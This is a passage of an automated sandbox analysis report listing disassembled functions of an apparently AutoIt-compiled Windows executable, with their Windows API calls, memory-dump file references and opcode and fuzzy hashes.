                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: 01665cd09c760f965a6c80a3d4ff6c6d610cd09edfddbcf14538e08979009143
                                                                                        • Instruction ID: 674ab53838a1008d0a2487aa1b96b7ae043bf78b540310386529eed67350cfa4
                                                                                        • Opcode Fuzzy Hash: 01665cd09c760f965a6c80a3d4ff6c6d610cd09edfddbcf14538e08979009143
                                                                                        • Instruction Fuzzy Hash: 5A31CDB1D01109BFEB159F95DC85AFFBBBCEF08310F000569E912A2151D7749F49AB60
                                                                                        Function 00F48FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F48FE7
                                                                                        • GetWindowLongW.USER32(0102D688,000000F0), ref: 00F4901A
                                                                                        • GetWindowLongW.USER32(0102D688,000000F0), ref: 00F4904F
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F49081
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F490AB
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F490BC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F490D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: db578ac6dda84797203e0946e3756208ed316e259cfcc594e81ad1f36c2c346a
                                                                                        • Instruction ID: 4576b0cfc726f3f6d4a678fb676fd0d003c92b1ccc31c90b403b3c10b2481be9
                                                                                        • Opcode Fuzzy Hash: db578ac6dda84797203e0946e3756208ed316e259cfcc594e81ad1f36c2c346a
                                                                                        • Instruction Fuzzy Hash: 80311975B041199FDB20CF68DC84F563BA5FB4A764F154164F925CB2B1CBB2AC40EB41
                                                                                        Function 00F208AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F208F2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F20918
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F2091B
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F20939
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F20942
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F20967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F20975
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: f6033d7ca6acc38ddb04d35691be59c62613617640eb688092d484c4911a2409
                                                                                        • Instruction ID: 187304280cb2fa2be7727e721e2a0151949ddfc5488c1567fe57f4e54d122931
                                                                                        • Opcode Fuzzy Hash: f6033d7ca6acc38ddb04d35691be59c62613617640eb688092d484c4911a2409
                                                                                        • Instruction Fuzzy Hash: C2215677A01219AFAB109FB8DC88DBB73ACEB09370B048125F915DB252DA70EC45D760
                                                                                        Function 00F22472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 8cf14028a5c87dfb361cca16029c8335ef67e18813f3cf7cfa5302c443b5ddf7
                                                                                        • Instruction ID: 06b6bab3ff77ae6651fe32a2e3df9a441fb31a64ddf228f39f674cb9d5ab9a5d
                                                                                        • Opcode Fuzzy Hash: 8cf14028a5c87dfb361cca16029c8335ef67e18813f3cf7cfa5302c443b5ddf7
                                                                                        • Instruction Fuzzy Hash: E5216A3260413577D720FB24AD13FBB73D8EF64310F64C426F549A7082E7559942F2A1
                                                                                        Function 00F20986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F209CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F209F1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F209F4
                                                                                        • SysAllocString.OLEAUT32 ref: 00F20A15
                                                                                        • SysFreeString.OLEAUT32 ref: 00F20A1E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F20A38
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F20A46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 561bc61c53eb910b22eff949e0bded95b14ea64348e5536655d0a45b8a4128a4
                                                                                        • Instruction ID: fc6560f87ad6d580f4a5dba07a2168bfa86dcc189570981e669dc58d12624bc4
                                                                                        • Opcode Fuzzy Hash: 561bc61c53eb910b22eff949e0bded95b14ea64348e5536655d0a45b8a4128a4
                                                                                        • Instruction Fuzzy Hash: 2A217776600218AFDB10DFA8DC88D6B77ECEF083607448125F919CB261DA74EC419B64
                                                                                        Function 00F4A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                          • Part of subcall function 00EFD17C: GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                          • Part of subcall function 00EFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F4A32D
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F4A33A
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F4A345
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F4A354
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F4A360
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 0092d0f1c2557c080e46d0e614d298b088bc698b8528be607e47d69bba2249e3
                                                                                        • Instruction ID: cced10d54f697aa334800af1d070a39aaeed1d63e444e59b30bc2d8abe366604
                                                                                        • Opcode Fuzzy Hash: 0092d0f1c2557c080e46d0e614d298b088bc698b8528be607e47d69bba2249e3
                                                                                        • Instruction Fuzzy Hash: FF1190B155021DBEEF119F64CC85EEB7F6DFF097A8F014114FA08A60A0C6729C21EBA4
                                                                                        Function 00EFCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00EFCCF6
                                                                                        • GetWindowRect.USER32(?,?), ref: 00EFCD37
                                                                                        • ScreenToClient.USER32(?,?), ref: 00EFCD5F
                                                                                        • GetClientRect.USER32(?,?), ref: 00EFCE8C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00EFCEA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 8b511cf3e0ef47b4c5089becf614fa995073e05a5d44498a3501b969fda696b5
                                                                                        • Instruction ID: 7d6c2125f63058fc887e63ef2544edd84a3a7183edcbbf64af28fe363f562432
                                                                                        • Opcode Fuzzy Hash: 8b511cf3e0ef47b4c5089becf614fa995073e05a5d44498a3501b969fda696b5
                                                                                        • Instruction Fuzzy Hash: 3CB15979A0024DDBDB14CFA8C5807FDBBB1FF08310F249129EE59AB250DB70AA54DB64
                                                                                        Function 00F41BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00F41C18
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00F41C26
                                                                                        • __wsplitpath.LIBCMT ref: 00F41C54
                                                                                          • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
                                                                                        • _wcscat.LIBCMT ref: 00F41C69
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00F41CDF
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F41CF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1380811348-0
                                                                                        • Opcode ID: c116bf14d37f89a4b446dbbb9c7f84da844a0364e5a1bac07a8ec28273fee78e
                                                                                        • Instruction ID: b1b05833ae88560dbe517459f3635c49ad21fd44067283022335acf7ffa981df
                                                                                        • Opcode Fuzzy Hash: c116bf14d37f89a4b446dbbb9c7f84da844a0364e5a1bac07a8ec28273fee78e
                                                                                        • Instruction Fuzzy Hash: 3B517E715043449FD720EF24CC85EABBBE8EF88754F00491EF989A7291EB74D905DB92
                                                                                        Function 00F42FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F430AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F430EF
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F43112
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F4313B
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F4317E
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F4318B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 3451389628-0
                                                                                        • Opcode ID: c78775a3d54a947b1dca08b4fbe46be4b859831376a5f93589928dcf65105876
                                                                                        • Instruction ID: d60baa30161e1a0ac9dedbe62f1f560359153fe33a1c7e7c9c5397f8787e579e
                                                                                        • Opcode Fuzzy Hash: c78775a3d54a947b1dca08b4fbe46be4b859831376a5f93589928dcf65105876
                                                                                        • Instruction Fuzzy Hash: ED516631608244AFC704EF68CC85E6ABBE9FF88314F04491DF995972A1DB71EA05EB52
                                                                                        Function 00F484DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00F48540
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00F48577
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F4859F
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F4860E
                                                                                        • GetSubMenu.USER32(?,?), ref: 00F4861C
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F4866D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 4a9277880145a39af9f83b00db793894110041d3fcb678ba626923f0a0f11544
                                                                                        • Instruction ID: 1606ecae4a6d7e73d54029498fa67a9a5373425e56065e87805f5cd6b77bba08
                                                                                        • Opcode Fuzzy Hash: 4a9277880145a39af9f83b00db793894110041d3fcb678ba626923f0a0f11544
                                                                                        • Instruction Fuzzy Hash: CA51BF31E00218AFCF11EF64C941AAEBBF4EF48760F154459ED15B7391CB74AE419B90
                                                                                        Function 00F24AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F24B10
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F24B5B
                                                                                        • IsMenu.USER32(00000000), ref: 00F24B7B
                                                                                        • CreatePopupMenu.USER32 ref: 00F24BAF
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00F24C0D
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F24C3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: 3221e5ab726a1d1d2079460edafb563fdb5396634bf3bb979e419edb7b2172a2
                                                                                        • Instruction ID: 9d6bcbe37e313bcdfcfe8ffe130e950d283538de111d300898c0130076d201e7
                                                                                        • Opcode Fuzzy Hash: 3221e5ab726a1d1d2079460edafb563fdb5396634bf3bb979e419edb7b2172a2
                                                                                        • Instruction Fuzzy Hash: 9E51D270A01269DFCF20CF68E888BADBBF4EF44328F144159E425AB291D7F4A944EB51
                                                                                        Function 00F38DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00F7DC00), ref: 00F38E7C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38E89
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00F38EAD
                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00F38EC5
                                                                                        • _strlen.LIBCMT ref: 00F38EF7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38F6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                        • String ID:
                                                                                        • API String ID: 2217125717-0
                                                                                        • Opcode ID: a29fc214e366871d91b43c5c4f9dd3db06dfbcdd252414c4dc1145033ca8bb04
                                                                                        • Instruction ID: 0424a9bd997a32457e1d900e6a6eaf6fea438a2e9d70c55b9833f699079d6a17
                                                                                        • Opcode Fuzzy Hash: a29fc214e366871d91b43c5c4f9dd3db06dfbcdd252414c4dc1145033ca8bb04
                                                                                        • Instruction Fuzzy Hash: 0D41D471A00208AFCB14EFB4DD85EAEB7B9AF08360F104659F516A72D1DF74AE41DB60
                                                                                        Function 00EFABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • BeginPaint.USER32(?,?,?), ref: 00EFAC2A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00EFAC8E
                                                                                        • ScreenToClient.USER32(?,?), ref: 00EFACAB
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EFACBC
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00EFAD06
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F5E673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 2592858361-0
                                                                                        • Opcode ID: 136f8e9e40f70ed65f0b8ac560a05107aa6a9a3263b90574ec2838a8ae6b89e1
                                                                                        • Instruction ID: 80d1252a26ad7f7122f046602ebdec9ac2caba29f2540fe6660e9bc38449359a
                                                                                        • Opcode Fuzzy Hash: 136f8e9e40f70ed65f0b8ac560a05107aa6a9a3263b90574ec2838a8ae6b89e1
                                                                                        • Instruction Fuzzy Hash: EF41C6B15043099FC710DF14CC84FB77BE8FB59364F080669FAA89B2A1C7719944EB62
                                                                                        Function 00F4E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00FA1628,00000000,00FA1628,00000000,00000000,00FA1628,?,00F5DC5D,00000000,?,00000000,00000000,00000000,?,00F5DAD1,00000004), ref: 00F4E40B
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00F4E42F
                                                                                        • ShowWindow.USER32(00FA1628,00000000), ref: 00F4E48F
                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 00F4E4A1
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00F4E4C5
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F4E4E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: b63b331078910b991984ca8d5949b07039c805478897298283eb107cfbc42b74
                                                                                        • Instruction ID: 95e5ad31548d36f8fb3cc91580a2d9a3ea574e91de786343ed9b6ecdd4953399
                                                                                        • Opcode Fuzzy Hash: b63b331078910b991984ca8d5949b07039c805478897298283eb107cfbc42b74
                                                                                        • Instruction Fuzzy Hash: D2416038A01144EFDB22CF24C499B947FE1BF19324F1981A9EE598F2B2C771E845EB51
                                                                                        Function 00F298BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F298D1
                                                                                          • Part of subcall function 00EFF4EA: std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                          • Part of subcall function 00EFF4EA: __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F29908
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00F29924
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00F2999E
